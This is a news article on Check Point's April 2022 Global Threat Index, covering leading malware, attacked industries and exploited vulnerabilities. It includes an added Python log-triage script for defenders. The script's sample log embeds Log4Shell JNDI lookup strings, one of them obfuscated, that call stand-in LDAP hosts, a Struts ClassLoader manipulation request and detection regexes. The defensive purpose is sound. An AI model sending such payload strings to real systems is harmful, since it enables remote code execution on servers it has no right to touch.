Check Point Research, the research arm of Check Point Software Technologies Ltd., has published its Global Threat Index for April 2022. Researchers report that Emotet is still the most common malware, affecting 6% of organizations worldwide. Despite this, every other malicious program on the list moved.
Tofsee and Nanocore dropped off the list and were replaced by Formbook and Lokibot, which are now the second and sixth most common malware respectively.

Emotet's higher score in March (10%) was mainly due to specific Easter-themed scams, but this month's decline could also be explained by Microsoft disabling specific macros associated with Office files, which affects the way Emotet is usually delivered. In fact, there are reports that Emotet has a new delivery method: phishing emails containing a OneDrive URL.
Emotet has many uses once it bypasses a machine's security. Thanks to its advanced propagation and assimilation techniques, Emotet is also offered to other cybercriminals on dark web forums as a delivery vehicle for further malware, including banking Trojans, ransomware, botnets and so on. As a result, once Emotet finds a way in, the consequences vary depending on which malware was delivered after the initial breach.
Elsewhere in the index, Lokibot, an infostealer, returned to the list in sixth place after a high-profile spam campaign delivered the malware via xlsx files posing as legitimate invoices. This, along with the rise of Formbook, affected the position of other malware: the advanced remote access trojan (RAT) Agent Tesla, for example, fell from second to third place.
At the end of March, critical vulnerabilities were identified in the Java Spring Framework, known as Spring4Shell, and since then numerous threat actors have used them to spread Mirai, the ninth most common malware this month.
"With the cyber threat landscape constantly evolving and with large companies such as Microsoft influencing the parameters within which cybercriminals can operate, perpetrators are becoming more creative in the way they distribute malware, as shown by the new distribution method now used by Emotet," said Maya Horowitz, VP of Research at Check Point.
"In addition, this month we have seen the Spring4Shell vulnerabilities make the front page. Although it is not yet in the top ten vulnerabilities, it is worth noting that over 35% of organizations worldwide have already been affected by this threat in just the first month, so we expect to see it rise to the top in the coming months."
CPR also revealed this month that Education and Research remains the industry most targeted by cybercriminals worldwide. "Web Server Exposed Git Repository Information Disclosure" is the most exploited vulnerability, affecting 46% of organizations worldwide, closely followed by "Apache Log4j Remote Code Execution". "Apache Struts ParametersInterceptor ClassLoader Security Bypass" enters the index, now occupying third place with a global impact of 45%.
Top malware families
* The arrows refer to the change in ranking compared to the previous month.
This month Emotet is still the most widespread malware, affecting 6% of organizations worldwide, closely followed by Formbook, affecting 3% of organizations, and Agent Tesla, with a global impact of 2%.
- ↔ Emotet - An advanced, self-propagating modular trojan. Emotet once served as a banking trojan and has recently been used to distribute other malware or malware campaigns. It uses many evasion methods and techniques to persist on the system and avoid detection. It is typically spread by spam emails containing phishing attachments or links.
- ↑ Formbook - Formbook is an infostealer targeting the Windows operating system, first identified in 2016. It is marketed as Malware-as-a-Service (MaaS) in underground hacking forums for its strong evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files as instructed by its C&C.
- ↓ Agent Tesla - Agent Tesla is an advanced RAT that works as a keylogger and information stealer, capable of monitoring and collecting the victim's keyboard input and system clipboard, taking screenshots, and exfiltrating credentials from various software installed on the victim's machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook).
Top attacked industries worldwide
This month Education/Research is the most attacked industry worldwide, followed by Government/Military and Internet Service Providers & Managed Service Providers (ISP & MSP).
1. Education and Research
2. Government & Military
3. Internet Service Providers & Managed Service Providers (ISP & MSP)
Top exploited vulnerabilities
This month "Web Server Exposed Git Repository Information Disclosure" is the most exploited vulnerability, impacting 46% of organizations globally, closely followed by "Apache Log4j Remote Code Execution" with a global impact of 46%. "Apache Struts ParametersInterceptor ClassLoader Security Bypass" is now in third place on the list of most exploited vulnerabilities, with a global impact of 45%.
- ↑ Web Server Exposed Git Repository Information Disclosure - An information disclosure vulnerability has been reported in Git Repository. Successful exploitation could allow unintentional disclosure of account information.
- ↓ Apache Log4j Remote Code Execution (CVE-2021-44228) - A remote code execution vulnerability exists in Apache Log4j. Successful exploitation could allow a remote attacker to execute arbitrary code on the affected system.
- ↑ Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0114) - A security bypass vulnerability exists in Apache Struts. The vulnerability is due to insufficient validation of the data processed by ParametersInterceptor, which allows manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by supplying a class parameter to an application.
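As an added illustration (this is not Check Point's code and is not part of the index itself), the following Python script shows how a SOC analyst might triage these three entries against web-server access logs: it flags requests into a `.git` directory (and distinguishes a served file from a mere probe by the status code), `${jndi:` lookups in any logged attacker-controlled field (including the `${lower:j}ndi` obfuscation), and Struts parameter names reaching `class.classLoader`. The log lines, addresses and paths are constructed samples, and the regexes are my assumptions rather than Check Point's signatures.

```python
"""Detection logic for the three most exploited vulnerabilities in the April 2022
index (exposed .git directory, Log4j JNDI lookups, Struts ClassLoader parameter
manipulation), run over constructed web-server access-log lines.

Added example, not Check Point's code. Log lines, IP addresses and paths are
constructed for the demonstration; the regexes are assumptions that match the
request shapes these attacks usually produce and are a triage starting point,
not a complete signature set.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log (Combined Log Format). No real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Apr/2022:10:01:12 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/7.79.1"
203.0.113.7 - - [05/Apr/2022:10:01:13 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "curl/7.79.1"
198.51.100.4 - - [05/Apr/2022:10:02:40 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Apr/2022:10:03:01 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.55 - - [05/Apr/2022:10:04:27 +0000] "GET /app/login.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps HTTP/1.1" 302 0 "-" "python-requests/2.27"
192.0.2.56 - - [05/Apr/2022:10:05:00 +0000] "GET /app/login.action?user=bob&password=x HTTP/1.1" 200 10 "-" "Mozilla/5.0"
198.51.100.10 - - [05/Apr/2022:10:06:30 +0000] "GET / HTTP/1.1" 200 5120 "-" "${${lower:j}ndi:ldap://198.51.100.10/b}"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one Combined Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def normalize(value):
    """URL-decode and collapse the ${lower:x}/${upper:x} nesting used to hide the
    literal string 'jndi' from naive matchers."""
    s = unquote(value)
    prev = None
    while prev != s:
        prev = s
        s = re.sub(r"\$\{(?:lower|upper):([^}]*)\}", r"\1", s, flags=re.I)
    return s


def is_git_exposure(rec):
    # Any request into /.git/ (HEAD, config, index, objects/...); /.gitignore does not match.
    return re.search(r"/\.git(?:/|$)", urlsplit(rec["path"]).path) is not None


def is_log4j_jndi(rec):
    # Log4Shell payloads arrive in whichever logged field the attacker controls.
    fields = (rec["path"], rec["ua"], rec["referer"])
    return any(re.search(r"\$\{\s*jndi\s*:", normalize(f), re.I) for f in fields)


def is_struts_classloader(rec):
    # ParametersInterceptor bypass: a parameter name reaching class.classLoader
    # (also seen as Class.classLoader or class['classLoader']).
    query = normalize(urlsplit(rec["path"]).query)
    return re.search(r"class\s*(?:\.|\[\s*['\"]?)\s*classLoader", query, re.I) is not None


RULES = {
    "git-exposure": is_git_exposure,
    "log4j-jndi": is_log4j_jndi,
    "struts-classloader": is_struts_classloader,
}


def scan(log_text):
    """Return one finding per (line, rule) hit. For git-exposure a 2xx status means
    the server actually served the file (repository exposed); a 404 is only a probe."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, check in RULES.items():
            if check(rec):
                findings.append({
                    "rule": name,
                    "ip": rec["ip"],
                    "path": rec["path"],
                    "status": rec["status"],
                    "confirmed": name == "git-exposure" and 200 <= rec["status"] < 300,
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['rule']:<20} {f['ip']:<15} status={f['status']} "
              f"confirmed={f['confirmed']} {f['path']}")
```

Run as-is, the script reports two `.git` hits from the same source (only the first one confirmed, since the second returned 404), two Log4j findings (one URL-encoded in the query string, one obfuscated in the User-Agent) and one Struts `class.classLoader` manipulation; the ordinary login request and the static page produce nothing. For the Git case, a confirmed hit should be followed by checking whether `.git/config` carries a remote URL with embedded credentials, which is the "account information" the index entry refers to.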
Top mobile malware
This month AlienBot is the most common mobile malware, followed by FluBot and xHelper.
- AlienBot - The AlienBot malware family is a Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker, as a first step, to inject malicious code into legitimate financial applications. The attacker gains access to the victims' accounts and eventually takes full control of their device.
- FluBot - FluBot is Android malware distributed via SMS phishing (smishing) messages, most often impersonating logistics delivery brands. Once the user clicks the link in the message, they are redirected to download a fake app containing FluBot. Once installed, the malware has several capabilities for harvesting credentials and supporting the smishing operation itself, including uploading the contact list and sending SMS messages to other phone numbers.
- xHelper - A malicious application seen in the wild since March 2019, used to download other malicious apps and display advertisements. The app is capable of hiding itself from the user and reinstalling itself if it has been uninstalled.
Top 10 malware in Greece

| Malware | Global impact | Greece |
|---|---|---|
| Emotet | 6.43% | 13.97% |
| Agent Tesla | 2.45% | 9.22% |
| Lokibot | 1.84% | 8.38% |
| Formbook | 3.42% | 6.15% |
| XMRig | 2.45% | 2.79% |
| Vidar | 1.06% | 2.51% |
| Hail Mary | 0.39% | 2.23% |
| MassLogger | 0.15% | 1.68% |
| Remcos | 1.08% | 1.68% |
| Seraph | 0.46% | 1.68% |
Check Point Software's Global Threat Impact List and ThreatCloud Map draw on Check Point's ThreatCloud intelligence, the company's largest collaborative network for fighting cybercrime, which provides threat data and attack trends from a global network of threat sensors.
The ThreatCloud database inspects over 3 billion websites and 600 million files daily and identifies more than 250 million malware activities every day.
The full list of the top 10 malware families in April 2022 can be found on the Check Point blog.
